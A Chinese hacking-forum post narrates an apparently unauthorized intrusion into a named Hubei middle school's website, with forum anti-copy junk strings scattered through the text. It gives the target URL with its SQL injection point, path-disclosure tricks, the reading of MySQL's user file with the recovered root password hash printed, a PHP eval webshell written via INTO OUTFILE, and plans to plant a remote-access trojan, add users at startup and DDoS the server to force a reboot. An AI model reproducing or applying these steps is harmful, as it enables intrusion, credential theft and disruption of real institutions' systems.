找回密码
 立即注册
查看: 3262|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
1 U, ]- m  ^0 `! b发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
( v( C5 s) ~3 _! J. x7 F6 k" Y7 y1 B' D/ d6 F

# H8 Y2 N; T6 O4 j/ r/ S/ K/ t1 P; [8 @% q0 ?0 U) X7 j
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : a( d: n; y, L
4 |5 D2 J  b# G, u" h- L
那么想可以直接写入shell ,getshell有几个条件:
4 B- Y8 J6 r* G0 C5 J6 S
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
3 e7 t" ^6 \3 U' S8 {/ g* c9 d: I  {7 k: ]/ b; T; O
试着爆绝对路径:1 [3 M- e2 w5 Q5 T; Z8 Y
1./phpMyAdmin/index.php?lang[]=1  
" A* @, l* _( {0 E- H( P2./phpMyAdmin/phpinfo.php  " B( v0 k( G4 v' C9 n* H2 t' Y
3./load_file()  
5 H! O) C. u7 }# O# }9 K4./phpmyadmin/themes/darkblue_orange/layout.inc.php  : S" W7 V& K" [3 m" u4 N1 Y
5./phpmyadmin/libraries/select_lang.lib.php  ; s8 b: x. Y$ _( q% N% P, c; w2 d
6./phpmyadmin/libraries/lect_lang.lib.php  . Z. |7 i+ ^* w" y) n8 i
7./phpmyadmin/libraries/mcrypt.lib.php   1 S6 u$ T8 N. H4 D7 [. J
8./phpmyadmin/libraries/export/xls.php  
0 X2 H% ]0 g/ |0 n% w
4 t; b, `7 l: K* t. x均不行...........................
2 f( t, E: n5 G0 I! X- j! d. W# F5 `" P1 D0 P
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php; Q# |: T) |  p" Q) J% F

! ^  _3 D! P  w权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
! H1 ]/ V2 P. N# `. B
8 r! W, |. Q* V1 \- k; A默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
- N+ G: L* ]; I5 d+ ?6 H( y& ~9 l; E0 d. w2 T1 h) r' w% q
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
+ m+ [7 M/ M0 f$ Q$ c- p# h- p& O4 r, K3 c4 a' a6 r4 p) }8 r
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 4 \% A( \3 B+ s4 c6 G/ ^: j1 [5 O' \

+ _+ n" f' U1 [- Qhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini * f! Y) O5 H! D: N+ U
6 t7 s( t# |" S9 ]
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD / S+ ?* r8 K$ _$ R/ L: T

: Y" [3 Z5 w3 l& i' ~成功读到root密码:
6 v. a* a/ j; S
% y0 _% \2 A2 J  b, T) l: z# x/ Y7 C5 Y17---- r(0072): \! U$ U! |4 k3 K( z- Z  W1 _
18---- o(006f)
" }6 d# L* T/ Q- |, u% t19---- o(006f)0 p7 q- U6 n; E' F
20---- t(0074)3 i) ^2 A+ E6 j, z8 R( g8 Z* L
21---- *(002a). y4 X- ^: G! H9 i  W
22---- 8(0038)
$ X/ }- m: P9 Y0 O3 k" o& l/ `23---- 2(0032)3 e$ c* u0 c8 R" d1 v: [3 H
24---- E(0045)
' W9 Y# |; C0 P  L/ W; e1 S25---- 1(0031)
0 f- I' D4 k( V3 [+ a26---- C(0043)
- C5 U5 M2 E% P! C! O27---- 5(0035)0 J  W9 O7 z" h  V1 y8 Y8 V: R* K
28---- 8(0038)( s, D( g& ]# m+ D/ Q& U
29---- 2(0032)
% t( }: k* \: I* l5 I5 ^  _30---- 8(0038)1 _5 @! [  Y: D
31---- A(0041), Y0 ]8 }% h3 l, U0 R
32---- 9(0039), U+ h2 `* Y$ v0 P+ l7 w
33---- B(0042)
1 f) G3 ^2 r, ^" \) e+ u0 y34---- 5(0035)
4 X; H+ `5 ~2 H35---- 4(0034)
- s& K0 S. P+ t" O36---- 8(0038)* T; w( M/ k6 I' \. B' E+ \
37---- 6(0036)
  M- [8 ]+ |' f, B1 G# n0 a* d: d" ]38---- 4(0034)
! H% O5 F. G2 c$ z39---- 9(0039)! {1 [) J# k6 `/ S
40---- 1(0031)( L% n5 Y* o  t& ?
41---- 1(0031); p. l, B8 R$ A9 Q7 _- k6 |" V) p1 g
42---- 5(0035)7 n2 S4 H0 i2 J- K. H
43---- 3(0033)* H& W7 o2 e5 j3 h/ A( ?: z
44---- 5(0035)
; p1 ?2 x1 [9 k, }45---- 9(0039)! g+ p. n% X( \1 m  ?
46---- 8(0038)
5 c3 A( J# H  x+ [$ ?! Q. T47---- F(0046)5 B/ W) q: |1 c2 }0 }
48---- F(0046)' @( [- Q- h7 g5 K+ f
49---- 4(0034)
+ g. }! Z5 l6 G- [- f; x/ l/ ?50---- F(0046)
9 O( H; W8 Y5 r4 k51---- 0(0030)* `" D  }/ a) g0 v2 \
52---- 3(0033)3 ~% A0 n: `& E' C9 _8 b+ R
53---- 2(0032)
% O: r! R1 v: _% S# B) X) f, i54---- A(0041)8 k; b8 p3 b3 ^% D) O2 p" Z$ u. m
55---- 4(0034)6 |' d4 g/ L. k0 c, ]
56---- A(0041)
! ~9 z2 y2 p$ O- D9 M57---- B(0042)
; m  p8 h% v8 N2 x  v  F/ T58---- *(0044)
2 h/ q$ L) y7 v( W: C: {59---- *(0035)' e/ C5 P8 z1 N/ C5 `
60---- *(0041)
2 f" x& l4 ^. h7 S4 o) _* h61---- *0032)
  ?, m0 H& g* `7 R- C. n7 l- X( @: y3 c% e& R' v7 Y  l$ |( `8 M1 W
解密后成功登陆phpmyamin  N: z4 O' d8 L
                          & F2 I+ c- I# _4 |+ Z, L7 a: {  _
4 e- f& I, \5 C9 e: ]# p
                             0 w9 \5 G4 h$ ~- F% Z, R2 B% l3 q

  T! B4 X; _) X7 x0 q$ D; [# q找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
; a. p8 R+ Q2 [/ i0 Q0 s% c; e/ x0 C- e. S) L" ~
成功执行,拿下shell,菜刀连接:
& m, @$ `( x; e* C
9 C* K# D: W4 C3 A6 B. h9 E服务器不支持asp,aspx,php提权无果...................* t% Y4 _# Q7 C7 ^* [

' [$ z( [. C) Y2 F7 E: T但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
4 N- y1 U8 T; y; \, A' ~( i
服务器上已经有个隐藏帐号了

+ o: Z: C7 j: o5 H1 Y! i
别名     administrators
$ O" h0 x8 \$ v1 s; x& A7 b# S注释     管理员对计算机/域有不受限制的完全访问权
7 u( M( A/ v/ ^! o* _# r
成员

8 M' g. a' {3 {6 }5 _' f7 x
-------------------------------------------------------------------------------
; i* Y. ^8 \" q5 E! i0 g0 Sadmin& P/ G6 n% J! {& |' ]# P3 h
Administrator
0 o0 C$ t" q% @" J( S+ bslipper$
3 K9 {3 p& W& y& Lsqluser
" |1 \7 |2 m' t! [2 o命令成功完成。 # u. P0 a9 {/ W! l. k: s, Y

+ t( U0 f1 z1 _% g; n" H服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
, G( ]) F' O. R# A) r1 o$ V; E& G. z8 ?3 M8 [3 J( _
ddos服务器重启,不然就只能坐等服务器重启了...............................
: g) Z8 j, m1 N
* y/ D6 `4 B! W3 T5 R! N' h      
4 Q& M$ K5 a: T% W7 }5 t

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表